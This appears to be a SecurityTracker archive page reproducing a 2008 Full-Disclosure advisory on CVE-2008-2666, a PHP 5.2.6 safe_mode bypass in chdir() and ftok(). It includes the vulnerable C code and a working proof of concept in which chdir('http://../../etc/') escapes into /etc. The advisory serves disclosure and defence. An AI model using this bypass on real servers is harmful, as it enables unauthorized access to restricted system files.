SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


Try our Premium Alert Service
 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service





Category:   Application (Generic)  >   PHP Vendors:   PHP Group
PHP File and Directory Function safe_mode Restrictions Can By Bypass With 'http://' Prefix
SecurityTracker Alert ID:  1020328
SecurityTracker URL:  http://securitytracker.com/id/1020328
CVE Reference:   CVE-2008-2666   (Links to External Site)
Date:  Jun 19 2008
Impact:   Disclosure of system information, Disclosure of user information, Modification of system information, Modification of user information
Exploit Included:  Yes  
Version(s): 5.2.6
Description:   A vulnerability was reported in PHP. A user can bypass safe_mode restrictions.

A user can supply a specially crafted value to various file and directory functions, including the chdir() and ftok() functions to bypass safe_mode restrictions. A value beginning with the 'http://' prefix can trigger the flaw.

Other functions are affected.

Maksymilian Arciemowicz (cXIb8O3) of SecurityReason.com reported this vulnerability.

Impact:   A user can bypass safe_mode restrictions.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.php.net/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] PHP 5.2.6 chdir(),

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass ]

Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- - Written: 10.05.2008
- - Public: 17.06.2008

SecurityReason Research
SecurityAlert Id: 55

CVE: CVE-2008-2666
CWE: CWE-264
SecurityRisk: Medium

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/55
Vendor: http://www.php.net

- --- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific
 features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

chdir ? Change directory

SYNOPSIS:

bool chdir  ( string $directory  )

http://pl.php.net/manual/en/function.chdir.php


ftok ? Convert a pathname and a project identifier to a System V IPC key

SYNOPSIS:

int ftok  ( string $pathname  , string $proj  )

http://pl.php.net/manual/en/function.ftok.php

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LIST ALL VULNERABLE FUNCTIONS

- --- 1. chdir(), ftok() (from standard ext) and more safe_mode bypass ---
Let's see to chdir() function 

- ---
PHP_FUNCTION(chdir)
{
	char *str;
	int ret, str_len;
	
	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) {
		RETURN_FALSE;
	}

	if ((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)) {
		RETURN_FALSE;
	}
	ret = VCWD_CHDIR(str);
	
	if (ret != 0) {
		php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s (errno %d)", strerror(errno), errno);
		RETURN_FALSE;
	}

	RETURN_TRUE;
}
- ---

str is beeing checked by safe_mode
example:

- ---
Warning: chdir(): SAFE MODE Restriction in effect.  The script whose uid is 80 is not allowed to access / owned by uid 0 in /www/mb/mb.php
 on line 8
- ---

in current directory, we should create subdir "http:". => it is possible to create chdir("http://../../../../../../")
and we are in /

Why?

TRUE==((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)))

for
str="http://../../../../../../"

safe_mode will ignore all paths with http://

that same situation with ftok() function (and more)

- ---EXAMPLE1---
cxib# cat /www/wufff.php
<?
echo getcwd()."\n";
chdir("/etc/");
echo getcwd()."\n";
?>
cxib# ls -la /www/wufff.php
- -rw-r--r--  1 www  www  62 Jun 17 17:14 /www/wufff.php
cxib# php /www/wufff.php
/www

Warning: chdir(): SAFE MODE Restriction in effect.  The script whose uid is 80 is not allowed to access /etc/ owned by uid 0 in /www/wufff.php
 on line 3
/www
cxib#
- ---/EXAMPLE1---

- ---EXAMPLE2---
cxib# ls -la /www/wufff.php
- -rw-r--r--  1 www  www  74 Jun 17 17:13 /www/wufff.php
cxib# ls -la /www/http:
total 8
drwxr-xr-x   2 www  www   512 Jun 17 17:12 .
drwxr-xr-x  19 www  www  4608 Jun 17 17:13 ..
cxib# cat /www/wufff.php
<?
echo getcwd()."\n";
chdir("http://../../etc/");
echo getcwd()."\n";
?>
cxib# php /www/wufff.php
/www
/etc
cxib#
- ---/EXAMPLE2---

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LISTS ALL VULNERABLE FUNCTIONS

- --- 2. How to fix ---
Do not use safe_mode as a main safety

- --- 3. Greets ---
sp3x Infospec schain p_e_a Chujwamwdupe

- --- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.4 (FreeBSD)

iD8DBQFIWCCbW1OhNJH6DMURAsNnAJsEVuvHigC9EZfcg0hhFtlXJsaCMQCgl0w9
W6fcb5TR6GxN9osji+wQCqM=
=tyyL
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2018, SecurityGlobal.net LLC